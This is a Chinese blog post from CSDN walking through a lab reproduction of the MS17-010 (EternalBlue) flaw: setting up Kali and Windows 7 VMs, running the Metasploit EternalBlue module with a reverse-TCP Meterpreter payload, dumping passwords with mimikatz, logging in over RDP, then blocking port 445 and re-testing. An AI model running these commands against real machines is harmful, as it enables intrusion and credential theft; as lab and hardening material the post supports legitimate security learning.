ms17_010漏洞复现

最新推荐文章于 2024-08-15 14:04:56 发布
最新推荐文章于 2024-08-15 14:04:56 发布
阅读量2.1k 收藏 6
点赞数
文章标签: 安全 信息安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40582773/article/details/108675972
版权

二、环境搭建
测试环境:攻击机:kail(192.168.132.132)
靶机:win7 x64(192.168.132.128)
虚拟机:VMware workstation
2.1 利用VMware workstation搭建MS17_010漏洞环境
1)为保证虚拟机下的win7和kail能互相ping通,要做2步

第一步:虚拟机下的win7和kail都设置为桥接模式

第二步:把win7的防火墙关了:控制面板-系统和安全-windows防火墙-打开或关闭windows防火墙

2) 为保证虚拟机下的win7的445端口打开

三、漏洞复现
利用kail的msf进行攻击。
3.1 启动msf
root@kali:~# msfconsole

3.2 寻找ms17_010漏洞

msf5 > search ms17_010

msf5 > use 2【利用2漏洞】
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options【显示配置】

3.3 配置【目标地址RHOST】【PAYLOAD】【本地地址LHOST】
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.132.128
msf5 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.132.132

四、攻击

4.1 利用meterpreter进行攻击
查看权限:meterpreter > getuid

桌面截图:meterpreter > screenshot

4.2拿到对方系统所有用户的用户名/密码,只需2步
第一步:用meterpreter中的mimikatz模块密码
meterpreter > load mimikatz

第二步:获取用户密码
meterpreter > wdigest

4.3.远程桌面连接,另起终端,可以在对方主机上做任何事
root@kali:~# rdesktop 192.168.132.133 -u xuanxi -p 123456

五、加固后检查
使用策略封闭445端口进行抵御
5.1 加固
1.win7 ctrl+R打开运行窗口,输入gpedit打开本地安全策略

2.计算机配置–windows设置–安全设置–IP安全策略

3.右键创建新安全策略,一直下一步,直到IP筛选列表

4. 一直下一步,直到以下这一步,点击“添加”

  1. 一直点下一步,直到以下这一步,目标地址,选择“我的IP地址”

6.选择协议类型,“tcp”

7.一直下一步,直到以下这一步,端口“445”

8.一直下一步,直到“完成”,列表上会新加一行

9.把刚才加的添加上

10.一直点下一步,直到以下,选择“阻止”

11.完成,然后右击,选择“分配”

5.2检查
再用msf攻击一遍
在这里插入图片描述

攻击失败,升级成功。

qq_40582773
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透测试和复现ms17-010漏洞攻击
Yb528970805的博客
09-15 435
ms17_010 是一种操作系统漏洞,仅影响 Windows系统中的 SMBv1 服务。这个漏洞是由于SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。
ms17-010 漏洞复现-主要用来学习交流
qq_30302577的博客
12-12 4571
ms17-010 漏洞复现-主要用来学习交流(32位系统) 目录: 文章目录ms17-010 漏洞复现-主要用来学习交流(32位系统)一.漏洞原理1.简介2.漏洞原理代码详解二.漏洞复现1.目标信息收集2. 尝试攻击2.1. 查看漏洞模块 search ms17-0102.2. 可以先使用辅助模块来扫描测试 auxiliary/scanner/smb/smb_ms17_0102.3 使用攻击模...
MS17-010 漏洞利用+修复方法
qq_44484541的博客
04-07 2887
使用时一般配合查看远程用户的空闲时长,空闲时间再进行远程登陆,减小被发现的风险。可以发现,靶机上扫到4个漏洞,其中包括了ms17-010。开始攻击,出现meterpreter >表示运行成功。rhosts显示远程主机未配置,配置目标主机ip。开始扫描漏洞,确认靶机存在ms17-010漏洞。使用扫描模块确认是否存在ms17-010漏洞。6.启用远程桌面,配合上一步获取到的密码登陆。使用ms17-010攻击模块并设置攻击载荷。利用nmap漏洞脚本进行扫描。搜索ms17-010相关模块。nmap端口快速扫描。
永恒之蓝复现
weixin_45116657的博客
08-16 750
一、实验环境: kali攻击机—IP地址:192.168.85.156 Win 2008靶机—IP地址:192.168.85.152 二、实验过程: 1、扫描靶机,查看445端口是否开放; 2、复现 2.1> 在kali中打开METASPLOIT 打开控制平台:msfconsole平台 2.2> 在msfconsole平台上搜索ms17-010相关模块; search ms17-...
内网渗透笔记-端口转发,内网代理
pyphrb的博客
07-28 9141
0x01 内网代理和转发1.1 正向代理(Forward Proxy)Lhost--》proxy--》Rhost Lhost为了访问到Rhost,向proxy发送了一个请求并且指定目标是Rhost,然后proxy向Rhost转交请求并将获得的内容返回给Lhost,简单来说正向代理就是proxy代替了我们去访问Rhost。1.2 反向代理(reverse proxy)Lhost<--->proxy<-
网络安全之Metasploit使用
qq_52074678的博客
05-05 3371
1.Metasploit-介绍 Mltasploit框架使Metasploit具有良好的可扩展性,它的控制接口负责发现漏洞,攻击漏洞,提交漏洞,然后通过一些接口加入攻击后处理工具和报表工具。Metaspolit框架可以从一个漏洞扫描程序导入数据,使用关于有洞主机的详细信息来发现可攻击漏洞,然后使用有效载荷对系统发起攻击,有效载荷在发现漏洞之后开发一种可行的攻击方法。其用于提取本地系统密码,安装其他软件或控制硬件的模块,这些功能很像以前的BO2K等工具所具备的功能。 2.Ubuntu安装msf 环境准备
MS17-010漏洞复现(永恒之蓝)
m0_73263892的博客
06-23 136
攻击机:kali靶机:win 7二 复现步骤1 进入msfconsole2 查找ms17-0103 使用辅助模块进行扫描use 34 查看选项5 设置目标主机IP6 进行扫描run发现目标主机可能存在ms17-010漏洞7 使用exploit模块use 08 查看选项9 设置目标主机IP10 开始攻击run返回一个独立shell 、
MSF笔记
super_m@n的博客
12-18 376
全称:metasploit 0*01模块介绍 /usr/share/metasploit-framework/modules auxiliary用于各种辅助功能 比如:信息收集、枚举、指纹探测、扫描 encoders编码模块,对payload进行加密 evasion exploits漏洞利用脚本目录 nops维持payload稳定性 payloads post 0*02简...
MSF课堂笔记
qq_33040633的博客
10-17 3035
msf
metasploit中msf批量监测
键盘上温暖而又美好的时光
05-21 1037
1.基础命令使用及其介绍 search 搜索命令 search cve 其中 excellent为可利用漏洞 use 使用命令 use exploit/windows/local/windscribe_windscribeservice_priv_esc info 显示信息命令 check 检测命令 检测木匾是否选定渗透攻击存在相应的安全漏洞 set 设置命令 set RHOST + 目标ip 设置目标ip地址 se...
Metasploit framework
qq_49091880的博客
01-27 596
工具:the Metasploit framework 1.启动命令:msfconsole 一些参数解释: (1)exploit:是代表利用漏洞进行攻击动作的模块 (2)auciliary:负责执行信息收集、扫描、嗅探 (3)post:后渗透模块 2.搜索命令 (1)例如:search ms17-010(搜索ms17-010漏洞模块) 查看是否存在这个漏洞 命令:set rhosts 目标主机IP地址 3.以ms17-010的第三个模块为例(永恒之蓝) 命令:use 3(利用永恒之蓝模块) 命令:info(
云曦暑期学习第六周——kali
2202_75317918的博客
08-21 404
云曦暑期学习第六周——kali
MSF(Metasploit)渗透测试---黑客工具使用指南
GitHub质检员
11-17 546
渗透测试者的困扰:在众多相同类型的工具,丌知道如何选择。认为需要掌插数百个工具软件,上千个命令参数,实在记丌住。新出现的漏洞 POC/EXP 有丌同的运行环境要求,准备工作繁琐。大部分时间都在学习丌同工具的使用习惯,如果能统一就好了,迚而 Metasploit 就产生了。POC,全称”Proof of Concept”,中文“概念验证”,常挃一段漏洞证明的代码。EXP,全称”Exploit”,中文“利用”,挃利用系统漏洞迚行攻击的劢作。
AI安全-文生图
最新发布
深度安全实验室
08-15 463
AI安全-文生图
永恒之蓝ms17_010漏洞复现实验
01-03
很抱歉,根据提供的引用内容,我无法提供关于永恒之蓝MS17-010漏洞复现实验。这是因为复现漏洞需要特定的环境和设备,并且涉及到非法活动。我强烈建议您不要尝试复现漏洞,以免违法和造成不必要的损失。 如果您对网络安全感兴趣,我可以为您提供一些关于网络安全的基础知识和防护措施。请问您对此感兴趣吗?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值